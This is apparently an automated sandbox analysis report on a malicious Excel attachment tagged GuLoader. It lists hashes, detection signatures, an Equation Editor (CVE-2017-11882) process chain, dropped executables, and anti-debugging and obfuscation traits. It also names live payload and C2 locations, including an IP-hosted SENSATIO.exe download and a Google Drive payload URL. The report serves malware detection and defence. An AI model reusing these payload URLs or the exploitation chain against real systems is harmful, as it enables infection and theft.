Windows Analysis Report 70A and 90A, quantity 20000 tons.xlsx

Overview

General Information

Sample Name: 70A and 90A, quantity 20000 tons.xlsx
Analysis ID: 483688
MD5: 3768dc6c162a6eb46c160c48916f76d2
SHA1: 3387bace48ffd1c07cb17b99e6c7919e11bbc508
SHA256: 5a95734977adad3b8ab8c71070fd89958b0ab5e756f297cf3303c697728f3ce9
Tags: GuLoader, VelvetSweatshop, xlsx

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Yara detected GuLoader
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to call native functions
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Found inlined nop instructions (likely shell or obfuscated code)
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection:

Found malware configuration
Source: 00000006.00000002.690715580.00000000002A0000.00000040.00000001.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=1xnnBgB9%"}
Multi AV Scanner detection for submitted file
Source: 70A and 90A, quantity 20000 tons.xlsx Virustotal: Detection: 31%
Source: 70A and 90A, quantity 20000 tons.xlsx ReversingLabs: Detection: 30%
Multi AV Scanner detection for domain / URL
Source: http://192.3.141.149/fresh/SENSATIO.exe Virustotal: Detection: 10%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\SENSATIO[1].exe Virustotal: Detection: 20%
Source: C:\Users\Public\vbc.exe Virustotal: Detection: 20%

Exploits:

Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\Public\vbc.exe Code function: 4x nop then mov eax, eax 6_2_004027C4
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 192.3.141.149:80
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 192.3.141.149:80
Source: excel.exe Memory has grown: Private usage: 4MB later: 70MB

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: https://drive.google.com/uc?export=download&id=1xnnBgB9%
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AS-COLOCROSSINGUS
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 192.3.141.149
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 15 Sep 2021 09:38:12 GMTServer: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/8.0.10Last-Modified: Tue, 14 Sep 2021 21:21:52 GMTETag: "1c000-5cbfb2b957c00"Accept-Ranges: bytesContent-Length: 114688Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownload
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /fresh/SENSATIO.exe HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 192.3.141.149 Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: vbc.exe, 00000006.00000002.692357733.00000000028C7000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: vbc.exe, 00000006.00000002.692357733.00000000028C7000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: vbc.exe, 00000006.00000002.692357733.00000000028C7000.00000002.00020000.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: vbc.exe, 00000006.00000002.692357733.00000000028C7000.00000002.00020000.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: 96D57846.emf.0.dr String found in binary or memory: http://www.day.com/dam/1.0
Source: vbc.exe, 00000006.00000002.692357733.00000000028C7000.00000002.00020000.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\96D57846.emf

System Summary:

Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\SENSATIO[1].exe
Detected potential crypto function
Source: C:\Users\Public\vbc.exe Code function: 6_2_0040284D 6_2_0040284D
Source: C:\Users\Public\vbc.exe Code function: 6_2_004028E6 6_2_004028E6
Source: C:\Users\Public\vbc.exe Code function: 6_2_004027C4 6_2_004027C4
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A6377 6_2_002A6377
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A7C0B 6_2_002A7C0B
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A2E1D 6_2_002A2E1D
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A8A12 6_2_002A8A12
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A6817 6_2_002A6817
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A946C 6_2_002A946C
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A4662 6_2_002A4662
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A087D 6_2_002A087D
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A1E72 6_2_002A1E72
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A3271 6_2_002A3271
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A1277 6_2_002A1277
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A224E 6_2_002A224E
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A025A 6_2_002A025A
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A3E5E 6_2_002A3E5E
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A2852 6_2_002A2852
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A2250 6_2_002A2250
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A2CA5 6_2_002A2CA5
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A1EB9 6_2_002A1EB9
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A22BD 6_2_002A22BD
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A8CB3 6_2_002A8CB3
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A8AB1 6_2_002A8AB1
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A208E 6_2_002A208E
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A0E8E 6_2_002A0E8E
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A1685 6_2_002A1685
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A189D 6_2_002A189D
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A0A97 6_2_002A0A97
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A4CE8 6_2_002A4CE8
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A50EF 6_2_002A50EF
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A02F9 6_2_002A02F9
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A8CC9 6_2_002A8CC9
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A04DB 6_2_002A04DB
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A96DE 6_2_002A96DE
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A332B 6_2_002A332B
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A8F27 6_2_002A8F27
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A973E 6_2_002A973E
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A1B3F 6_2_002A1B3F
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A7B0D 6_2_002A7B0D
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A1913 6_2_002A1913
Source: C:\Users\Public\vbc.exe Code function: 6_2_002AA517 6_2_002AA517
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A0F68 6_2_002A0F68
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A076C 6_2_002A076C
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A2F60 6_2_002A2F60
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A4B40 6_2_002A4B40
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A875A 6_2_002A875A
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A6350 6_2_002A6350
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A91AB 6_2_002A91AB
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A55AD 6_2_002A55AD
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A0BA2 6_2_002A0BA2
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A1DA0 6_2_002A1DA0
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A53B8 6_2_002A53B8
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A0B88 6_2_002A0B88
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A8981 6_2_002A8981
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A219D 6_2_002A219D
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A4BE9 6_2_002A4BE9
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A49E0 6_2_002A49E0
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A13CB 6_2_002A13CB
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A41CE 6_2_002A41CE
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A19CE 6_2_002A19CE
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A9FC6 6_2_002A9FC6
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A29C5 6_2_002A29C5
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A95DA 6_2_002A95DA
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A53D8 6_2_002A53D8
Source: C:\Users\Public\vbc.exe Code function: 6_2_002AA5D0 6_2_002AA5D0
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A25D7 6_2_002A25D7
Contains functionality to call native functions
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A6377 NtAllocateVirtualMemory, 6_2_002A6377
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A6350 NtAllocateVirtualMemory, 6_2_002A6350
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A63BB NtAllocateVirtualMemory, 6_2_002A63BB
Abnormal high CPU Usage
Source: C:\Users\Public\vbc.exe Process Stats: CPU usage > 98%
PE file contains strange resources
Source: SENSATIO[1].exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\Public\vbc.exe Memory allocated: 76E90000 page execute and read and write
Source: 70A and 90A, quantity 20000 tons.xlsx Virustotal: Detection: 31%
Source: 70A and 90A, quantity 20000 tons.xlsx ReversingLabs: Detection: 30%
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$70A and 90A, quantity 20000 tons.xlsx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRFA16.tmp
Source: classification engine Classification label: mal100.troj.expl.winXLSX@4/21@0/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Data Obfuscation:

Yara detected GuLoader
Source: Yara match File source: 00000006.00000002.690715580.00000000002A0000.00000040.00000001.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\vbc.exe Code function: 6_2_00406848 push edx; ret 6_2_0040696F
Source: C:\Users\Public\vbc.exe Code function: 6_2_00403E49 push ecx; ret 6_2_00403E91
Source: C:\Users\Public\vbc.exe Code function: 6_2_00404E5E push 00000055h; ret 6_2_00404E7D
Source: C:\Users\Public\vbc.exe Code function: 6_2_00403868 push 00000012h; retf 6_2_004038BD
Source: C:\Users\Public\vbc.exe Code function: 6_2_0040886D push edx; ret 6_2_004088AD
Source: C:\Users\Public\vbc.exe Code function: 6_2_00407676 pushad ; ret 6_2_00407679
Source: C:\Users\Public\vbc.exe Code function: 6_2_0040442D push esp; ret 6_2_00404439
Source: C:\Users\Public\vbc.exe Code function: 6_2_00406A30 push esp; ret 6_2_00406A91
Source: C:\Users\Public\vbc.exe Code function: 6_2_00408E36 push edx; ret 6_2_00408E41
Source: C:\Users\Public\vbc.exe Code function: 6_2_004054C9 push edx; ret 6_2_004054E5
Source: C:\Users\Public\vbc.exe Code function: 6_2_00406ED5 push esi; ret 6_2_00406EED
Source: C:\Users\Public\vbc.exe Code function: 6_2_004078DF push ss; iretd 6_2_004078E0
Source: C:\Users\Public\vbc.exe Code function: 6_2_00403AF4 push esp; ret 6_2_00403C81
Source: C:\Users\Public\vbc.exe Code function: 6_2_004090F7 push edx; ret 6_2_00409105
Source: C:\Users\Public\vbc.exe Code function: 6_2_004050F8 push edx; ret 6_2_004050F9
Source: C:\Users\Public\vbc.exe Code function: 6_2_004078F9 push esp; ret 6_2_00407901
Source: C:\Users\Public\vbc.exe Code function: 6_2_00404E85 push edi; ret 6_2_00404E95
Source: C:\Users\Public\vbc.exe Code function: 6_2_00409887 push ss; ret 6_2_00409938
Source: C:\Users\Public\vbc.exe Code function: 6_2_0040468F push ecx; iretd 6_2_004046B7
Source: C:\Users\Public\vbc.exe Code function: 6_2_00406A92 push esp; ret 6_2_00406A91
Source: C:\Users\Public\vbc.exe Code function: 6_2_00407B45 push eax; ret 6_2_00407B46
Source: C:\Users\Public\vbc.exe Code function: 6_2_00409945 push esp; ret 6_2_00409951
Source: C:\Users\Public\vbc.exe Code function: 6_2_00405F51 push edx; ret 6_2_00405F91
Source: C:\Users\Public\vbc.exe Code function: 6_2_00403952 push 00000012h; retf 6_2_004038BD
Source: C:\Users\Public\vbc.exe Code function: 6_2_00404F54 push esi; ret 6_2_00404F55
Source: C:\Users\Public\vbc.exe Code function: 6_2_00403B66 push esp; ret 6_2_00403C81
Source: C:\Users\Public\vbc.exe Code function: 6_2_00408769 push edx; ret 6_2_004088AD
Source: C:\Users\Public\vbc.exe Code function: 6_2_00408B6B push esp; iretd 6_2_00408B6C
Source: C:\Users\Public\vbc.exe Code function: 6_2_0040956C push ebp; ret 6_2_0040956D
Source: C:\Users\Public\vbc.exe Code function: 6_2_00404174 push esp; ret 6_2_00404175
Source: C:\Users\Public\vbc.exe Code function: 6_2_00407F79 push esi; ret 6_2_00407F91

Persistence and Installation Behavior:

Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\SENSATIO[1].exe
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe

Boot Survival:

Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2816 Thread sleep time: -360000s >= -30000s
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A8A83 rdtsc 6_2_002A8A83

Anti Debugging:

Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A8A83 rdtsc 6_2_002A8A83
Contains functionality to read the PEB
Source: C:\Users\Public\vbc.exe Code function: 6_2_004027C4 mov ebx, dword ptr fs:[00000030h] 6_2_004027C4
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A863C mov eax, dword ptr fs:[00000030h] 6_2_002A863C
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A946C mov eax, dword ptr fs:[00000030h] 6_2_002A946C
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A5E70 mov eax, dword ptr fs:[00000030h] 6_2_002A5E70
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A3271 mov eax, dword ptr fs:[00000030h] 6_2_002A3271
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A3E5E mov eax, dword ptr fs:[00000030h] 6_2_002A3E5E
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A0E8E mov eax, dword ptr fs:[00000030h] 6_2_002A0E8E
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A3ACB mov eax, dword ptr fs:[00000030h] 6_2_002A3ACB
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A3B26 mov eax, dword ptr fs:[00000030h] 6_2_002A3B26
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A7F4E mov eax, dword ptr fs:[00000030h] 6_2_002A7F4E
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A91AB mov eax, dword ptr fs:[00000030h] 6_2_002A91AB
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A0BA2 mov eax, dword ptr fs:[00000030h] 6_2_002A0BA2

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: vbc.exe, 00000006.00000002.691215980.0000000000840000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000006.00000002.691215980.0000000000840000.00000002.00020000.sdmp Binary or memory string: !Progman
Source: vbc.exe, 00000006.00000002.691215980.0000000000840000.00000002.00020000.sdmp Binary or memory string: Program Manager<